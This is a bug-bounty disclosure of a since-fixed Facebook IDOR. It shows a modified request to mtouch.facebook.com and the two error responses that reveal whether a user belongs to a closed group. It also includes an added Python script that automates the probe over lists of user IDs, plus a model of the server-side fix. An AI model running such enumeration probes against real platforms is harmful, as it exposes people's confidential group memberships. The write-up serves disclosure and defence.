The issue is an Insecure Direct Object Reference (IDOR) that lets a malicious user expose, or confirm, whether a given person is a member of a closed group. The issue has a limit: it only works when the attacker and the member of the closed group are friends. That is why the bounty was $3,000; without that limit (no friendship between attacker and victim) the reward would have been $5,000.
A person's membership in a closed group is confidential: only the admins are visible. But a person's membership status can be determined by modifying an HTTP request sent via mtouch.facebook.com. The attacker first captures the request that approves a join request (confirm=Approve) in a group he manages, then replaces the group ID with that of the target group and the user ID with that of the person to check. The person's membership status is then revealed by the error "Already a Member".
POST /a/group/?gid=GROUP_ID&aid=USER_ID&refid=18 HTTP/1.1
Host: mtouch.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
…..
confirm=Approve&m_sess=&fb_dtsg=
…..
Change gid= to the victim's group_id; aid= is the user_id whose membership status is to be checked.

If the person is not a member, the response is:

for (;;);{"__ar":1,"error":1376045,"errorSummary":"Cannot add member","errorDescription":"You need to be an admin or a moderator of the group, or a friend of this person, to add them as a member.","payload":null,"bootloadable":{},"ixData":{},"bxData":{},"gkxData":{},"qexData":{},"lid":""}

But if the person is a member of the group, the response is:

for (;;);{"__ar":1,"error":1376015,"errorSummary":"Already a Member","errorDescription":"The person you've just tried to add is already a member of this group.","payload":null,"bootloadable":{},"ixData":{},"bxData":{},"gkxData":{},"qexData":{},"lid":""}

The two error codes differ only according to the target's membership, so the endpoint acts as a yes/no oracle that can be run over a list of user IDs.
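The following script is an added example, not code from the original write-up or from Facebook. It shows the oracle end to end: building the modified probe request, stripping the `for (;;);` anti-JSON-hijacking prefix that Facebook prepends to responses, classifying each response by the two error codes shown above, and running the probe over a list of user IDs. The `fetch` callback, the `fb_dtsg`/`m_sess` values (the attacker's own session tokens) and the user/group IDs are assumptions; the sample responses are abridged copies of the two bodies on this page. The `add_member_hardened` function at the end is an assumed model of the server-side fix, not Facebook's actual code: it checks that the caller is an admin or moderator of the target group before touching the membership state, so the response can no longer reveal that state to an outsider.

```python
import json
import urllib.parse

# Error codes observed in the write-up's responses.
ERR_ALREADY_MEMBER = 1376015   # "Already a Member"  -> target is in the group
ERR_CANNOT_ADD = 1376045       # "Cannot add member" -> target is not in the group


def build_probe(group_id, user_id, fb_dtsg, m_sess=""):
    """Return (path, body) for one membership probe, mirroring the request in the
    write-up. fb_dtsg / m_sess are the attacker's own session tokens (assumed)."""
    query = urllib.parse.urlencode({"gid": group_id, "aid": user_id, "refid": 18})
    body = urllib.parse.urlencode({"confirm": "Approve", "m_sess": m_sess, "fb_dtsg": fb_dtsg})
    return "/a/group/?" + query, body


def parse_fb_response(text):
    """Strip the 'for (;;);' prefix (anti-JSON-hijacking) and decode the JSON."""
    prefix = "for (;;);"
    if text.startswith(prefix):
        text = text[len(prefix):]
    return json.loads(text)


def classify(text):
    """Map one response body to a membership verdict.
    Per the write-up, the verdict is only reliable when the attacker is
    friends with the target; anything unexpected is reported as unknown."""
    try:
        data = parse_fb_response(text)
    except ValueError:
        return "unknown"
    code = data.get("error")
    if code == ERR_ALREADY_MEMBER:
        return "member"
    if code == ERR_CANNOT_ADD:
        return "not_member"
    return "unknown"


def enumerate_members(group_id, user_ids, fb_dtsg, fetch):
    """Run the oracle over a list of user IDs. fetch(path, body) performs the POST
    to mtouch.facebook.com with the attacker's session and returns the body text;
    it is injected so the logic can be exercised offline."""
    return {uid: classify(fetch(*build_probe(group_id, uid, fb_dtsg))) for uid in user_ids}


# Constructed sample responses, abridged from the two bodies quoted in the write-up.
SAMPLE_MEMBER = ('for (;;);{"__ar":1,"error":1376015,"errorSummary":"Already a Member",'
                 '"errorDescription":"The person you\'ve just tried to add is already a member '
                 'of this group.","payload":null}')
SAMPLE_NOT_MEMBER = ('for (;;);{"__ar":1,"error":1376045,"errorSummary":"Cannot add member",'
                     '"errorDescription":"You need to be an admin or a moderator of the group, '
                     'or a friend of this person, to add them as a member.","payload":null}')


def demo():
    """Offline run against canned responses keyed by the probed user ID (assumed IDs)."""
    canned = {"1001": SAMPLE_MEMBER, "1002": SAMPLE_NOT_MEMBER, "1003": "<html>login</html>"}

    def fetch(path, body):
        uid = urllib.parse.parse_qs(urllib.parse.urlsplit(path).query)["aid"][0]
        return canned[uid]

    return enumerate_members("123456", list(canned), "DTSG_TOKEN", fetch)


def add_member_hardened(caller_is_group_admin, target_is_member):
    """Assumed model of the fix (not Facebook's code): authorize the caller against
    the *group* first, so an outsider gets the same error whether or not the target
    is a member. Returns an error code, or 0 on success."""
    if not caller_is_group_admin:
        return ERR_CANNOT_ADD
    if target_is_member:
        return ERR_ALREADY_MEMBER
    return 0


if __name__ == "__main__":
    for uid, verdict in demo().items():
        print(uid, verdict)
```

The root cause visible in the two responses is ordering: the server looked up whether the target was already a member before deciding whether the caller was allowed to add anyone to that group, so the error code leaked group state. In `add_member_hardened` an outsider receives `ERR_CANNOT_ADD` regardless of the target's status, which is the property a fix has to restore.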
26 May 2019: Reported
30 May 2019: Request for more information
13 June 2019: Facebook fixed the issue
2 October 2019: Bounty awarded